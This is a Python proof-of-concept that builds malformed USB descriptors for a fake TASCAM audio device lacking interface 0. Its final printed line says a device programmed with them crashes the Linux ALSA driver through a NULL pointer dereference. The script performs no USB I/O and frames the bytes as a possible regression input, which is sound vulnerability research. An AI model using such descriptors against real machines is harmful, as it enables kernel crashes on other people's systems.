# This PoC builds the descriptor bytes that describe the malicious USB device.
# The descriptors declare a USB configuration that contains Interface 1 but no Interface 0.
import usb.core
import usb.util
def create_malicious_device_descriptor():
    """Return the raw descriptor bytes of a malformed TASCAM US-144MKII look-alike.

    The result is a flat list of 36 ints: an 18-byte device descriptor, a
    9-byte configuration descriptor and one 9-byte interface descriptor, in
    that order. The only interface carries bInterfaceNumber=1, so no
    interface 0 is described. The function only builds the list; it performs
    no USB I/O.

    Defensive use: per this PoC's own description, the affected ALSA driver
    assumes interface 0 exists. These bytes can serve as a regression input
    for a probe path that rejects the device when the interface-0 lookup
    returns nothing (NOTE(review): inferred from the page's wording; confirm
    against the actual driver patch).
    """
    # Device descriptor, simplified. Multi-byte fields are little-endian.
    device = (
        0x12,        # bLength (18 bytes)
        0x01,        # bDescriptorType: Device
        0x00, 0x02,  # bcdUSB: 2.0
        0x00,        # bDeviceClass
        0x00,        # bDeviceSubClass
        0x00,        # bDeviceProtocol
        0x40,        # bMaxPacketSize0
        0x44, 0x06,  # idVendor (TASCAM, per the author)
        0x49, 0x80,  # idProduct (US-144MKII, per the author)
        0x00, 0x01,  # bcdDevice
        0x01,        # iManufacturer
        0x02,        # iProduct
        0x00,        # iSerialNumber
        0x01,        # bNumConfigurations
    )

    # Configuration descriptor.
    configuration = (
        0x09,        # bLength
        0x02,        # bDescriptorType: Configuration
        0x20, 0x00,  # wTotalLength (declares 32; only 18 bytes are built below)
        0x01,        # bNumInterfaces: one interface claimed
        0x01,        # bConfigurationValue
        0x00,        # iConfiguration
        0x80,        # bmAttributes: bus powered
        0x32,        # MaxPower: 100 mA
    )

    # Sole interface descriptor. It is numbered 1, so a host-side driver that
    # looks up interface 0 finds nothing; this is the assumption the PoC
    # says the driver gets wrong.
    interface = (
        0x09,        # bLength
        0x04,        # bDescriptorType: Interface
        0x01,        # bInterfaceNumber: 1 (interface 0 is absent)
        0x00,        # bAlternateSetting
        0x00,        # bNumEndpoints
        0x01,        # bInterfaceClass: Audio
        0x01,        # bInterfaceSubClass
        0x00,        # bInterfaceProtocol
        0x00,        # iInterface
    )

    # Callers get a fresh list on every call, as with the original concatenation.
    return [*device, *configuration, *interface]
# Status text only: in the code shown, create_malicious_device_descriptor()
# is never called and the script performs no USB I/O.
print(
    "Malicious USB Descriptor Structure Generated.",
    "Connect a device programmed with these descriptors to trigger the NULL pointer dereference in Linux Kernel ALSA.",
    sep="\n",
)